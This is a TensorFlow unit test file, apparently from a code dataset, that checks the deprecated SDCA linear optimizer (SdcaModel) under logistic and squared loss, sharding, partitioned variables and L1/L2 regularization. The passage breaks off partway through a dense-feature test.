source
stringlengths 3
86
| python
stringlengths 75
1.04M
|
|---|---|
sdca_ops_test.py
|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for SdcaModel (deprecated).
This module and all its submodules are deprecated. To UPDATE or USE linear
optimizers, please check its latest version in core:
tensorflow_estimator/python/estimator/canned/linear_optimizer/.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import random
import threading
from tensorflow.contrib.linear_optimizer.python.ops.sdca_ops import SdcaModel
from tensorflow.contrib.linear_optimizer.python.ops.sparse_feature_column import SparseFeatureColumn
from tensorflow.core.example import example_pb2
from tensorflow.core.protobuf import config_pb2
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors_impl
from tensorflow.python.framework import ops
from tensorflow.python.framework.test_util import TensorFlowTestCase
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import gen_sdca_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import parsing_ops
from tensorflow.python.ops import partitioned_variables
from tensorflow.python.ops import variable_scope
from tensorflow.python.ops import variables as variables_lib
from tensorflow.python.platform import googletest
_MAX_ITERATIONS = 100
_SHARD_NUMBERS = [None, 1, 3]
_NUM_LOSS_PARTITIONS = [4]
def make_example_proto(feature_dict, target, value=1.0):
e = example_pb2.Example()
features = e.features
features.feature['target'].float_list.value.append(target)
for key, values in feature_dict.items():
features.feature[key + '_indices'].int64_list.value.extend(values)
features.feature[key + '_values'].float_list.value.extend([value] *
len(values))
return e
def make_example_dict(example_protos, example_weights):
def parse_examples(example_protos):
features = {
'target':
parsing_ops.FixedLenFeature(
shape=[1], dtype=dtypes.float32, default_value=0),
'age_indices':
parsing_ops.VarLenFeature(dtype=dtypes.int64),
'age_values':
parsing_ops.VarLenFeature(dtype=dtypes.float32),
'gender_indices':
parsing_ops.VarLenFeature(dtype=dtypes.int64),
'gender_values':
parsing_ops.VarLenFeature(dtype=dtypes.float32)
}
return parsing_ops.parse_example(
[e.SerializeToString() for e in example_protos], features)
parsed = parse_examples(example_protos)
sparse_features = [
SparseFeatureColumn(
array_ops.reshape(
array_ops.split(
value=parsed['age_indices'].indices,
num_or_size_splits=2,
axis=1)[0], [-1]),
array_ops.reshape(parsed['age_indices'].values, [-1]),
array_ops.reshape(parsed['age_values'].values, [-1])),
SparseFeatureColumn(
array_ops.reshape(
array_ops.split(
value=parsed['gender_indices'].indices,
num_or_size_splits=2,
axis=1)[0], [-1]),
array_ops.reshape(parsed['gender_indices'].values, [-1]),
array_ops.reshape(parsed['gender_values'].values, [-1]))
]
return dict(
sparse_features=sparse_features,
dense_features=[],
example_weights=example_weights,
example_labels=array_ops.reshape(parsed['target'], [-1]),
example_ids=['%d' % i for i in range(0, len(example_protos))])
def make_random_examples_and_variables_dicts(num_examples, dim, num_non_zero):
random.seed(1)
sparse_features = [
SparseFeatureColumn(
[i for i in range(num_examples) for _ in range(num_non_zero)], [
i for _ in range(num_examples)
for i in random.sample(range(dim), num_non_zero)
],
[num_non_zero**(-0.5) for _ in range(num_examples * num_non_zero)])
]
examples_dict = dict(
sparse_features=sparse_features,
dense_features=[],
example_weights=[random.random() for _ in range(num_examples)],
example_labels=[
1. if random.random() > 0.5 else 0. for _ in range(num_examples)
],
example_ids=[str(i) for i in range(num_examples)])
weights = variables_lib.VariableV1(
array_ops.zeros([dim], dtype=dtypes.float32))
variables_dict = dict(
sparse_features_weights=[weights],
dense_features_weights=[])
return examples_dict, variables_dict
def make_variable_dict(max_age, max_gender, num_shards=None, partitioned=False):
# TODO(sibyl-toe9oF2e): Figure out how to derive max_age & max_gender from
# examples_dict.
partitioner = None
if partitioned:
partitioner = partitioned_variables.fixed_size_partitioner(num_shards=2,
axis=0)
with variable_scope.variable_scope(
name_or_scope=('variables/shard_{}'.format(num_shards)
if num_shards else 'variables'),
partitioner=partitioner):
age_weights = variable_scope.get_variable(
name='age',
initializer=array_ops.zeros([max_age + 1], dtype=dtypes.float32))
gender_weights = variable_scope.get_variable(
name='gender',
initializer=array_ops.zeros([max_gender + 1], dtype=dtypes.float32))
return dict(
sparse_features_weights=[age_weights, gender_weights],
dense_features_weights=[])
def make_dense_examples_and_variables_dicts(dense_features_values, weights,
labels):
"""Creates examples and variables dictionaries for dense features.
Variables shapes are inferred from the list of dense feature values passed as
argument.
Args:
dense_features_values: The values of the dense features
weights: The example weights.
labels: The example labels.
Returns:
One dictionary for the examples and one for the variables.
"""
dense_tensors = []
dense_weights = []
for dense_feature in dense_features_values:
dense_tensor = ops.convert_to_tensor(dense_feature, dtype=dtypes.float32)
check_shape_op = control_flow_ops.Assert(
math_ops.less_equal(array_ops.rank(dense_tensor), 2),
['dense_tensor shape must be [batch_size, dimension] or [batch_size]'])
# Reshape to [batch_size, dense_column_dimension].
with ops.control_dependencies([check_shape_op]):
dense_tensor = array_ops.reshape(
dense_tensor, [dense_tensor.get_shape().as_list()[0], -1])
dense_tensors.append(dense_tensor)
# Add variables of shape [feature_column_dimension].
dense_weights.append(
variables_lib.VariableV1(
array_ops.zeros(
[dense_tensor.get_shape().as_list()[1]], dtype=dtypes.float32)))
examples_dict = dict(
sparse_features=[],
dense_features=dense_tensors,
example_weights=weights,
example_labels=labels,
example_ids=['%d' % i for i in range(0, len(labels))])
variables_dict = dict(
sparse_features_weights=[], dense_features_weights=dense_weights)
return examples_dict, variables_dict
def get_binary_predictions_for_logistic(predictions, cutoff=0.5):
return math_ops.cast(
math_ops.greater_equal(predictions,
array_ops.ones_like(predictions) * cutoff),
dtype=dtypes.int32)
def get_binary_predictions_for_hinge(predictions):
return math_ops.cast(
math_ops.greater_equal(predictions, array_ops.zeros_like(predictions)),
dtype=dtypes.int32)
# TODO(sibyl-Mooth6ku): Add tests that exercise L1 and Shrinking.
# TODO(sibyl-vie3Poto): Refactor tests to avoid repetition of boilerplate code.
class SdcaModelTest(TensorFlowTestCase):
"""Base SDCA optimizer test class for any loss type."""
def _single_threaded_test_session(self):
config = config_pb2.ConfigProto(
inter_op_parallelism_threads=1, intra_op_parallelism_threads=1)
return self.test_session(use_gpu=False, config=config)
class SdcaWithLogisticLossTest(SdcaModelTest):
"""SDCA optimizer test class for logistic loss."""
def testSimple(self):
# Setup test data
example_protos = [
make_example_proto({
'age': [0],
'gender': [0]
}, 0),
make_example_proto({
'age': [1],
'gender': [1]
}, 1),
]
example_weights = [1.0, 1.0]
for num_shards in _SHARD_NUMBERS:
with self._single_threaded_test_session():
examples = make_example_dict(example_protos, example_weights)
variables = make_variable_dict(1, 1, num_shards)
options = dict(
symmetric_l2_regularization=1,
symmetric_l1_regularization=0,
num_table_shards=num_shards,
loss_type='logistic_loss')
lr = SdcaModel(examples, variables, options)
variables_lib.global_variables_initializer().run()
unregularized_loss = lr.unregularized_loss(examples)
loss = lr.regularized_loss(examples)
predictions = lr.predictions(examples)
self.assertAllClose(0.693147, unregularized_loss.eval())
self.assertAllClose(0.693147, loss.eval())
train_op = lr.minimize()
for _ in range(_MAX_ITERATIONS):
train_op.run()
lr.update_weights(train_op).run()
# The high tolerance in unregularized_loss comparisons is due to the
# fact that it's possible to trade off unregularized_loss vs.
# regularization and still have a sum that is quite close to the
# optimal regularized_loss value. SDCA's duality gap only ensures that
# the regularized_loss is within 0.01 of optimal.
# 0.525457 is the optimal regularized_loss.
# 0.411608 is the unregularized_loss at that optimum.
self.assertAllClose(0.411608, unregularized_loss.eval(), atol=0.05)
self.assertAllClose(0.525457, loss.eval(), atol=0.01)
predicted_labels = get_binary_predictions_for_logistic(predictions)
self.assertAllEqual([0, 1], predicted_labels.eval())
self.assertAllClose(
0.01, lr.approximate_duality_gap().eval(), rtol=1e-2, atol=1e-2)
def testPartitionedPrimals(self):
# Setup test data
example_protos = [
make_example_proto({
'age': [0],
'gender': [0]
}, 0),
make_example_proto({
'age': [1],
'gender': [1]
}, 1),
]
example_weights = [1.0, 1.0]
for num_shards in _SHARD_NUMBERS:
with self._single_threaded_test_session():
examples = make_example_dict(example_protos, example_weights)
variables = make_variable_dict(1, 1, num_shards, partitioned=True)
options = dict(
symmetric_l2_regularization=1,
symmetric_l1_regularization=0,
num_table_shards=num_shards,
loss_type='logistic_loss')
lr = SdcaModel(examples, variables, options)
variables_lib.global_variables_initializer().run()
unregularized_loss = lr.unregularized_loss(examples)
loss = lr.regularized_loss(examples)
predictions = lr.predictions(examples)
self.assertAllClose(0.693147, unregularized_loss.eval())
self.assertAllClose(0.693147, loss.eval())
train_op = lr.minimize()
for _ in range(_MAX_ITERATIONS):
train_op.run()
lr.update_weights(train_op).run()
# The high tolerance in unregularized_loss comparisons is due to the
# fact that it's possible to trade off unregularized_loss vs.
# regularization and still have a sum that is quite close to the
# optimal regularized_loss value. SDCA's duality gap only ensures that
# the regularized_loss is within 0.01 of optimal.
# 0.525457 is the optimal regularized_loss.
# 0.411608 is the unregularized_loss at that optimum.
self.assertAllClose(0.411608, unregularized_loss.eval(), atol=0.05)
self.assertAllClose(0.525457, loss.eval(), atol=0.01)
predicted_labels = get_binary_predictions_for_logistic(predictions)
self.assertAllEqual([0, 1], predicted_labels.eval())
self.assertAllClose(
0.01, lr.approximate_duality_gap().eval(), rtol=1e-2, atol=1e-2)
def testSomePartitionedPrimals(self):
# Setup test data
example_protos = [
make_example_proto({
'age': [0],
'gender': [0]
}, 0),
make_example_proto({
'age': [0],
'gender': [1]
}, 1),
]
example_weights = [1.0, 1.0]
for num_shards in _SHARD_NUMBERS:
with self._single_threaded_test_session():
examples = make_example_dict(example_protos, example_weights)
# Explicitly make age a [1]-shaped Variable (which cannot be
# partitioned), while making gender a PartitionedVariable.
age_weights = variables_lib.VariableV1(
array_ops.zeros([1], dtype=dtypes.float32))
with variable_scope.variable_scope(
name_or_scope=('variables/shard_{}'.format(num_shards)
if num_shards else 'variables'),
partitioner=partitioned_variables.fixed_size_partitioner(
num_shards=2, axis=0)):
gender_weights = variable_scope.get_variable(
name='gender',
initializer=array_ops.zeros([2], dtype=dtypes.float32))
variables = dict(
sparse_features_weights=[age_weights, gender_weights],
dense_features_weights=[])
options = dict(
symmetric_l2_regularization=1,
symmetric_l1_regularization=0,
num_table_shards=num_shards,
loss_type='logistic_loss')
lr = SdcaModel(examples, variables, options)
variables_lib.global_variables_initializer().run()
unregularized_loss = lr.unregularized_loss(examples)
loss = lr.regularized_loss(examples)
predictions = lr.predictions(examples)
self.assertAllClose(0.693147, unregularized_loss.eval())
self.assertAllClose(0.693147, loss.eval())
train_op = lr.minimize()
for _ in range(_MAX_ITERATIONS):
train_op.run()
lr.update_weights(train_op).run()
# The high tolerance in unregularized_loss comparisons is due to the
# fact that it's possible to trade off unregularized_loss vs.
# regularization and still have a sum that is quite close to the
# optimal regularized_loss value. SDCA's duality gap only ensures that
# the regularized_loss is within 0.01 of optimal.
# 0.525457 is the optimal regularized_loss.
# 0.593014 is the unregularized_loss at that optimum.
self.assertAllClose(0.512591, unregularized_loss.eval(), atol=0.05)
self.assertAllClose(0.593014, loss.eval(), atol=0.01)
predicted_labels = get_binary_predictions_for_logistic(predictions)
self.assertAllEqual([0, 1], predicted_labels.eval())
self.assertAllClose(
0.01, lr.approximate_duality_gap().eval(), rtol=1e-2, atol=1e-2)
def testSparseRandom(self):
dim = 20
num_examples = 1000
# Number of non-zero features per example.
non_zeros = 10
# Setup test data.
with self._single_threaded_test_session():
examples, variables = make_random_examples_and_variables_dicts(
num_examples, dim, non_zeros)
options = dict(
symmetric_l2_regularization=.1,
symmetric_l1_regularization=0,
num_table_shards=1,
adaptive=False,
loss_type='logistic_loss')
lr = SdcaModel(examples, variables, options)
variables_lib.global_variables_initializer().run()
train_op = lr.minimize()
for _ in range(4):
train_op.run()
lr.update_weights(train_op).run()
# Duality gap is 1.4e-5.
# It would be 0.01 without shuffling and 0.02 with adaptive sampling.
self.assertNear(0.0, lr.approximate_duality_gap().eval(), err=1e-3)
def testSparseDuplicate(self):
# Setup test data
example_protos = [
make_example_proto({
'age': [0] * 5,
'gender': [0] * 5
}, 0),
make_example_proto({
'age': [1] * 5,
'gender': [1] * 5
}, 1),
]
example_weights = [1.0, 1.0]
with self._single_threaded_test_session():
examples = make_example_dict(example_protos, example_weights)
variables = make_variable_dict(1, 1)
options = dict(
symmetric_l2_regularization=1,
symmetric_l1_regularization=0,
loss_type='logistic_loss')
lr = SdcaModel(examples, variables, options)
variables_lib.global_variables_initializer().run()
train_op = lr.minimize()
with self.assertRaisesRegexp(errors_impl.InvalidArgumentError,
'Duplicate'):
train_op.run()
def testDistributedSimple(self):
# Distributed SDCA may not converge if the workers update concurrently the
# same example. In this test the examples are partitioned across workers.
# The examples are the same for all workers, just the example_ids are
# different.
example_protos = [
make_example_proto({
'age': [0],
'gender': [0]
}, 0),
make_example_proto({
'age': [1],
'gender': [1]
}, 1),
]
example_weights = [1.0, 1.0]
examples = make_example_dict(example_protos, example_weights)
example_ids = array_ops.placeholder(
dtypes.string, shape=(len(example_weights),))
examples['example_ids'] = example_ids
variables = make_variable_dict(1, 1)
for num_shards in _SHARD_NUMBERS:
for num_loss_partitions in _NUM_LOSS_PARTITIONS:
with self._single_threaded_test_session():
options = dict(
# Keep the same solution as for TestSimple: since the number of
# examples is multplied by num_loss_partitions, multiply also
# L2 by the same value.
symmetric_l2_regularization=num_loss_partitions,
symmetric_l1_regularization=0,
loss_type='logistic_loss',
num_table_shards=num_shards,
num_loss_partitions=num_loss_partitions)
lr = SdcaModel(examples, variables, options)
variables_lib.global_variables_initializer().run()
unregularized_loss = lr.unregularized_loss(examples)
loss = lr.regularized_loss(examples)
predictions = lr.predictions(examples)
self.assertAllClose(0.693147, unregularized_loss.eval())
self.assertAllClose(0.693147, loss.eval())
train_op = lr.minimize()
def minimize(worker_id):
with self._single_threaded_test_session():
feed_dict = {example_ids: [
str(i + worker_id*len(example_weights)) for i in range(
len(example_weights))]}
for _ in range(_MAX_ITERATIONS):
train_op.run(feed_dict=feed_dict) # pylint: disable=cell-var-from-loop
threads = []
for worker_id in range(num_loss_partitions):
threads.append(threading.Thread(target=minimize, args=(worker_id,)))
threads[-1].start()
for t in threads:
t.join()
lr.update_weights(train_op).run(feed_dict={
example_ids: [str(i) for i in range(len(example_weights))]})
# Test only the unregularized loss because the optimal value of the
# regularized loss depends on num_loss_partitions.
self.assertAllClose(0.411608, unregularized_loss.eval(), atol=0.02)
predicted_labels = get_binary_predictions_for_logistic(predictions)
self.assertAllEqual([0, 1], predicted_labels.eval())
self.assertNear(0.0, lr.approximate_duality_gap().eval(), 0.02)
def testSimpleNoL2(self):
# Same as test above (so comments from above apply) but without an L2.
# The algorithm should behave as if we have an L2 of 1 in optimization but
# 0 in regularized_loss.
example_protos = [
make_example_proto({
'age': [0],
'gender': [0]
}, 0),
make_example_proto({
'age': [1],
'gender': [1]
}, 1),
]
example_weights = [1.0, 1.0]
for num_shards in _SHARD_NUMBERS:
with self._single_threaded_test_session():
examples = make_example_dict(example_protos, example_weights)
variables = make_variable_dict(1, 1, num_shards)
options = dict(
symmetric_l2_regularization=0,
symmetric_l1_regularization=0,
num_table_shards=num_shards,
loss_type='logistic_loss')
lr = SdcaModel(examples, variables, options)
variables_lib.global_variables_initializer().run()
unregularized_loss = lr.unregularized_loss(examples)
loss = lr.regularized_loss(examples)
predictions = lr.predictions(examples)
self.assertAllClose(0.693147, unregularized_loss.eval())
self.assertAllClose(0.693147, loss.eval())
train_op = lr.minimize()
for _ in range(_MAX_ITERATIONS):
train_op.run()
lr.update_weights(train_op).run()
# There is neither L1 nor L2 loss, so regularized and unregularized
# losses should be exactly the same.
self.assertAllClose(0.40244, unregularized_loss.eval(), atol=0.01)
self.assertAllClose(0.40244, loss.eval(), atol=0.01)
predicted_labels = get_binary_predictions_for_logistic(predictions)
self.assertAllEqual([0, 1], predicted_labels.eval())
self.assertAllClose(
0.01, lr.approximate_duality_gap().eval(), rtol=1e-2, atol=1e-2)
def testSomeUnweightedExamples(self):
# Setup test data with 4 examples, but should produce the same
# results as testSimple.
example_protos = [
# Will be used.
make_example_proto({
'age': [0],
'gender': [0]
}, 0),
# Will be ignored.
make_example_proto({
'age': [1],
'gender': [0]
}, 0),
# Will be used.
make_example_proto({
'age': [1],
'gender': [1]
}, 1),
# Will be ignored.
make_example_proto({
'age': [1],
'gender': [0]
}, 1),
]
example_weights = [1.0, 0.0, 1.0, 0.0]
for num_shards in _SHARD_NUMBERS:
with self._single_threaded_test_session():
# Only use examples 0 and 2
examples = make_example_dict(example_protos, example_weights)
variables = make_variable_dict(1, 1, num_shards)
options = dict(
symmetric_l2_regularization=1,
symmetric_l1_regularization=0,
num_table_shards=num_shards,
loss_type='logistic_loss')
lr = SdcaModel(examples, variables, options)
variables_lib.global_variables_initializer().run()
unregularized_loss = lr.unregularized_loss(examples)
loss = lr.regularized_loss(examples)
predictions = lr.predictions(examples)
train_op = lr.minimize()
for _ in range(_MAX_ITERATIONS):
train_op.run()
lr.update_weights(train_op).run()
self.assertAllClose(0.411608, unregularized_loss.eval(), atol=0.05)
self.assertAllClose(0.525457, loss.eval(), atol=0.01)
predicted_labels = get_binary_predictions_for_logistic(predictions)
self.assertAllClose([0, 1, 1, 1], predicted_labels.eval())
self.assertAllClose(
0.0, lr.approximate_duality_gap().eval(), rtol=1e-2, atol=1e-2)
def testFractionalExampleLabel(self):
# Setup test data with 1 positive, and 1 mostly-negative example.
example_protos = [
make_example_proto({
'age': [0],
'gender': [0]
}, 0.1),
make_example_proto({
'age': [1],
'gender': [1]
}, 0.9),
]
example_weights = [1.0, 1.0]
for num_shards in _SHARD_NUMBERS:
with self._single_threaded_test_session():
examples = make_example_dict(example_protos, example_weights)
variables = make_variable_dict(1, 1, num_shards)
options = dict(
symmetric_l2_regularization=1,
symmetric_l1_regularization=0,
num_table_shards=num_shards,
loss_type='logistic_loss')
lr = SdcaModel(examples, variables, options)
variables_lib.global_variables_initializer().run()
with self.assertRaisesOpError(
'Only labels of 0.0 or 1.0 are supported right now.'):
lr.minimize().run()
def testImbalanced(self):
# Setup test data with 1 positive, and 3 negative examples.
example_protos = [
make_example_proto({
'age': [0],
'gender': [0]
}, 0),
make_example_proto({
'age': [2],
'gender': [0]
}, 0),
make_example_proto({
'age': [3],
'gender': [0]
}, 0),
make_example_proto({
'age': [1],
'gender': [1]
}, 1),
]
example_weights = [1.0, 1.0, 1.0, 1.0]
for num_shards in _SHARD_NUMBERS:
with self._single_threaded_test_session():
examples = make_example_dict(example_protos, example_weights)
variables = make_variable_dict(3, 1, num_shards)
options = dict(
symmetric_l2_regularization=1,
symmetric_l1_regularization=0,
num_table_shards=num_shards,
loss_type='logistic_loss')
lr = SdcaModel(examples, variables, options)
variables_lib.global_variables_initializer().run()
unregularized_loss = lr.unregularized_loss(examples)
loss = lr.regularized_loss(examples)
predictions = lr.predictions(examples)
train_op = lr.minimize()
for _ in range(_MAX_ITERATIONS):
train_op.run()
lr.update_weights(train_op).run()
self.assertAllClose(
0.226487 + 0.102902, unregularized_loss.eval(), atol=0.08)
self.assertAllClose(0.328394 + 0.131364, loss.eval(), atol=0.01)
predicted_labels = get_binary_predictions_for_logistic(predictions)
self.assertAllEqual([0, 0, 0, 1], predicted_labels.eval())
self.assertAllClose(
0.0, lr.approximate_duality_gap().eval(), rtol=2e-2, atol=1e-2)
def testImbalancedWithExampleWeights(self):
# Setup test data with 1 positive, and 1 negative example.
example_protos = [
make_example_proto({
'age': [0],
'gender': [0]
}, 0),
make_example_proto({
'age': [1],
'gender': [1]
}, 1),
]
example_weights = [3.0, 1.0]
for num_shards in _SHARD_NUMBERS:
with self._single_threaded_test_session():
examples = make_example_dict(example_protos, example_weights)
variables = make_variable_dict(1, 1, num_shards)
options = dict(
symmetric_l2_regularization=1,
symmetric_l1_regularization=0,
num_table_shards=num_shards,
loss_type='logistic_loss')
lr = SdcaModel(examples, variables, options)
variables_lib.global_variables_initializer().run()
unregularized_loss = lr.unregularized_loss(examples)
loss = lr.regularized_loss(examples)
predictions = lr.predictions(examples)
train_op = lr.minimize()
for _ in range(_MAX_ITERATIONS):
train_op.run()
lr.update_weights(train_op).run()
self.assertAllClose(0.284860, unregularized_loss.eval(), atol=0.08)
self.assertAllClose(0.408044, loss.eval(), atol=0.012)
predicted_labels = get_binary_predictions_for_logistic(predictions)
self.assertAllEqual([0, 1], predicted_labels.eval())
self.assertAllClose(
0.0, lr.approximate_duality_gap().eval(), rtol=2e-2, atol=1e-2)
def testInstancesOfOneClassOnly(self):
# Setup test data with 1 positive (ignored), and 1 negative example.
example_protos = [
make_example_proto({
'age': [0],
'gender': [0]
}, 0),
make_example_proto({
'age': [1],
'gender': [0]
}, 1), # Shares gender with the instance above.
]
example_weights = [1.0, 0.0] # Second example "omitted" from training.
for num_shards in _SHARD_NUMBERS:
with self._single_threaded_test_session():
examples = make_example_dict(example_protos, example_weights)
variables = make_variable_dict(1, 1, num_shards)
options = dict(
symmetric_l2_regularization=1,
symmetric_l1_regularization=0,
num_table_shards=num_shards,
loss_type='logistic_loss')
lr = SdcaModel(examples, variables, options)
variables_lib.global_variables_initializer().run()
unregularized_loss = lr.unregularized_loss(examples)
loss = lr.regularized_loss(examples)
predictions = lr.predictions(examples)
train_op = lr.minimize()
for _ in range(_MAX_ITERATIONS):
train_op.run()
lr.update_weights(train_op).run()
self.assertAllClose(0.411608, unregularized_loss.eval(), atol=0.05)
self.assertAllClose(0.525457, loss.eval(), atol=0.01)
predicted_labels = get_binary_predictions_for_logistic(predictions)
self.assertAllEqual([0, 0], predicted_labels.eval())
self.assertAllClose(
0.01, lr.approximate_duality_gap().eval(), rtol=1e-2, atol=1e-2)
def testOutOfRangeSparseFeatures(self):
# Setup test data
example_protos = [
make_example_proto({
'age': [0],
'gender': [0]
}, 0),
make_example_proto({
'age': [1],
'gender': [1]
}, 1),
]
example_weights = [1.0, 1.0]
with self._single_threaded_test_session():
examples = make_example_dict(example_protos, example_weights)
variables = make_variable_dict(0, 0)
options = dict(
symmetric_l2_regularization=1,
symmetric_l1_regularization=0,
loss_type='logistic_loss')
lr = SdcaModel(examples, variables, options)
variables_lib.global_variables_initializer().run()
train_op = lr.minimize()
with self.assertRaisesRegexp(errors_impl.InvalidArgumentError,
'indices.*'):
train_op.run()
def testOutOfRangeDenseFeatures(self):
with self._single_threaded_test_session():
examples, variables = make_dense_examples_and_variables_dicts(
dense_features_values=[[[1.0, 0.0], [0.0, 1.0]]],
weights=[20.0, 10.0],
labels=[1.0, 0.0])
# Replace with a variable of size 1 instead of 2.
variables['dense_features_weights'] = [
variables_lib.VariableV1(array_ops.zeros(
[1], dtype=dtypes.float32))
]
options = dict(
symmetric_l2_regularization=1.0,
symmetric_l1_regularization=0,
loss_type='logistic_loss')
lr = SdcaModel(examples, variables, options)
variables_lib.global_variables_initializer().run()
train_op = lr.minimize()
with self.assertRaisesRegexp(
errors_impl.InvalidArgumentError,
'More dense features than we have parameters for.*'):
train_op.run()
# TODO(katsiaspis): add a test for the case when examples at the end of an
# epoch are repeated, since example id may be duplicated.
class SdcaWithLinearLossTest(SdcaModelTest):
"""SDCA optimizer test class for linear (squared) loss."""
def testSimple(self):
# Setup test data
example_protos = [
make_example_proto({
'age': [0],
'gender': [0]
}, -10.0),
make_example_proto({
'age': [1],
'gender': [1]
}, 14.0),
]
example_weights = [1.0, 1.0]
with self._single_threaded_test_session():
examples = make_example_dict(example_protos, example_weights)
variables = make_variable_dict(1, 1)
options = dict(
symmetric_l2_regularization=1,
symmetric_l1_regularization=0,
loss_type='squared_loss')
lr = SdcaModel(examples, variables, options)
variables_lib.global_variables_initializer().run()
predictions = lr.predictions(examples)
train_op = lr.minimize()
for _ in range(_MAX_ITERATIONS):
train_op.run()
lr.update_weights(train_op).run()
# Predictions should be 2/3 of label due to minimizing regularized loss:
# (label - 2 * weight)^2 / 2 + L2 * 2 * weight^2
self.assertAllClose(
[-20.0 / 3.0, 28.0 / 3.0], predictions.eval(), rtol=0.005)
# Approximate gap should be very close to 0.0. (In fact, because the gap
# is only approximate, it is likely that upon convergence the duality gap
# can have a tiny negative value).
self.assertAllClose(0.0, lr.approximate_duality_gap().eval(), atol=1e-2)
def testL2Regularization(self):
# Setup test data
example_protos = [
# 2 identical examples
make_example_proto({
'age': [0],
'gender': [0]
}, -10.0),
make_example_proto({
'age': [0],
'gender': [0]
}, -10.0),
# 2 more identical examples
make_example_proto({
'age': [1],
'gender': [1]
}, 14.0),
make_example_proto({
'age': [1],
'gender': [1]
}, 14.0),
]
example_weights = [1.0, 1.0, 1.0, 1.0]
with self._single_threaded_test_session():
examples = make_example_dict(example_protos, example_weights)
variables = make_variable_dict(1, 1)
options = dict(
symmetric_l2_regularization=16,
symmetric_l1_regularization=0,
loss_type='squared_loss')
lr = SdcaModel(examples, variables, options)
variables_lib.global_variables_initializer().run()
predictions = lr.predictions(examples)
train_op = lr.minimize()
for _ in range(_MAX_ITERATIONS):
train_op.run()
lr.update_weights(train_op).run()
# Predictions should be 1/5 of label due to minimizing regularized loss:
# (label - 2 * weight)^2 + L2 * 16 * weight^2
optimal1 = -10.0 / 5.0
optimal2 = 14.0 / 5.0
self.assertAllClose(
[optimal1, optimal1, optimal2, optimal2],
predictions.eval(),
rtol=0.01)
def testL1Regularization(self):
# Setup test data
example_protos = [
make_example_proto({
'age': [0],
'gender': [0]
}, -10.0),
make_example_proto({
'age': [1],
'gender': [1]
}, 14.0),
]
example_weights = [1.0, 1.0]
with self._single_threaded_test_session():
examples = make_example_dict(example_protos, example_weights)
variables = make_variable_dict(1, 1)
options = dict(
symmetric_l2_regularization=1.0,
symmetric_l1_regularization=4.0,
loss_type='squared_loss')
lr = SdcaModel(examples, variables, options)
variables_lib.global_variables_initializer().run()
prediction = lr.predictions(examples)
loss = lr.regularized_loss(examples)
train_op = lr.minimize()
for _ in range(_MAX_ITERATIONS):
train_op.run()
lr.update_weights(train_op).run()
# Predictions should be -4.0, 48/5 due to minimizing regularized loss:
# (label - 2 * weight)^2 / 2 + L2 * 2 * weight^2 + L1 * 4 * weight
self.assertAllClose([-4.0, 20.0 / 3.0], prediction.eval(), rtol=0.08)
# Loss should be the sum of the regularized loss value from above per
# example after plugging in the optimal weights.
self.assertAllClose(308.0 / 6.0, loss.eval(), atol=0.01)
def testFeatureValues(self):
# Setup test data
example_protos = [
make_example_proto({
'age': [0],
'gender': [0]
}, -10.0, -2.0),
make_example_proto({
'age': [1],
'gender': [1]
}, 14.0, 2.0),
]
example_weights = [5.0, 3.0]
with self._single_threaded_test_session():
examples = make_example_dict(example_protos, example_weights)
variables = make_variable_dict(1, 1)
options = dict(
symmetric_l2_regularization=1,
symmetric_l1_regularization=0,
loss_type='squared_loss')
lr = SdcaModel(examples, variables, options)
variables_lib.global_variables_initializer().run()
predictions = lr.predictions(examples)
train_op = lr.minimize()
for _ in range(_MAX_ITERATIONS):
train_op.run()
lr.update_weights(train_op).run()
# There are 4 (sparse) variable weights to be learned. 2 for age and 2 for
# gender. Let w_1, w_2 be age weights, w_3, w_4 be gender weights, y_1,
# y_2 be the labels for examples 1 and 2 respectively and s_1, s_2 the
# corresponding *example* weights. With the given feature values, the loss
# function is given by:
# s_1/2(y_1 + 2w_1 + 2w_3)^2 + s_2/2(y_2 - 2w_2 - 2w_4)^2
# + \lambda/2 (w_1^2 + w_2^2 + w_3^2 + w_4^2). Solving for the optimal, it
# can be verified that:
# w_1* = w_3* = -2.0 s_1 y_1/(\lambda + 8 s_1) and
# w_2* = w_4* = 2 \cdot s_2 y_2/(\lambda + 8 s_2). Equivalently, due to
# regularization and example weights, the predictions are within:
# 8 \cdot s_i /(\lambda + 8 \cdot s_i) of the labels.
self.assertAllClose(
[-10 * 40.0 / 41.0, 14.0 * 24 / 25.0], predictions.eval(), atol=0.01)
def testDenseFeaturesWithDefaultWeights(self):
with self._single_threaded_test_session():
examples, variables = make_dense_examples_and_variables_dicts(
dense_features_values=[[[1.0], [0.0]], [0.0, 1.0]],
weights=[1.0, 1.0],
labels=[10.0, -5.0])
options = dict(
symmetric_l2_regularization=1.0,
symmetric_l1_regularization=0,
loss_type='squared_loss')
lr = SdcaModel(examples, variables, options)
variables_lib.global_variables_initializer().run()
predictions = lr.predictions(examples)
train_op = lr.minimize()
for _ in range(_MAX_ITERATIONS):
train_op.run()
lr.update_weights(train_op).run()
# The loss function for these particular features is given by:
# 1/2(label_1-w_1)^2 + 1/2(label_2-w_2)^2 + \lambda/2 (w_1^2 + w_2^2). So,
# differentiating wrt to w_1, w_2 yields the following optimal values:
# w_1* = label_1/(\lambda + 1)= 10/2, w_2* =label_2/(\lambda + 1)= -5/2.
# In this case the (unnormalized regularized) loss will be:
# 1/2(10-5)^2 + 1/2(5-5/2)^2 + 1/2(5^2 + (5/2)^2) = 125.0/4. The actual
# loss should be further normalized by the sum of example weights.
self.assertAllClose([5.0, -2.5], predictions.eval(), rtol=0.01)
loss = lr.regularized_loss(examples)
self.assertAllClose(125.0 / 8.0, loss.eval(), atol=0.01)
def testDenseFeaturesWithArbitraryWeights(self):
with self._single_threaded_test_session():
examples, variables = make_dense_examples_and_variables_dicts(
dense_features_values=[[[1.0, 0.0], [0.0, 1.0]]],
weights=[20.0, 10.0],
labels=[10.0, -5.0])
options = dict(
symmetric_l2_regularization=5.0,
symmetric_l1_regularization=0,
